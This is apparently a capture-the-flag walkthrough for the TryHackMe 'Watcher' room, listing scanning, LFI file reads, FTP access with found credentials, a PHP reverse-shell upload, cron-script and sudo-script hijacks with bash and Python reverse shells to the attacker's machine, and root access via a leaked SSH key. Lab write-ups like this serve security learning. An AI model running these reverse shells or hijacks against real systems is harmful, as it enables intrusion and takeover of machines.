Watcher

Room Link: https://tryhackme.com/room/watcher

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w SecLists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt
cat results.txt | grep -v 2422

I used my wordlist of common found on LFI / RFI and confirmed I can view files on the server. I did not find anything useful

Kali

ffuf -c -u http://$VICTIM/post.php?post=FUZZ -w mylist.txt
cat results.txt | grep -v 2422

I remembered we had that secret file as well, I was able to read it and it had some credentials for FTP.

TCP/21 - FTP

Kali

ftp $VICTIM
Username:ftpuser
Password: givemefiles777 

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234 

Kali(ftp)

put php-reverse-shell.php

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

sudo -l

Lateral Movement - mat

Victim

cat /etc/crontab
cd /home/toby/jobs/

sudo -u toby rm -f cow.sh
sudo -u toby touch cow.sh
sudo -u toby chmod 777 cow.sh

echo '#!/bin/bash' > cow.sh
echo 'sh -i >& /dev/tcp/$KALI/1338 0>&1' >> cow.sh

Kali

nc -lvnp 1338

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Lateral Movement - will

Victim(mat)

sudo -l

Kali

nc -lvnp 4242

Victim(mat)

cd /home/mat/scripts/
echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$KALI",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > cmd.py

sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Victim(will)

cat /opt/backups/key.b64

Kali

chmod 600 id_rsa 
ssh root@$VICTIM -i id_rsa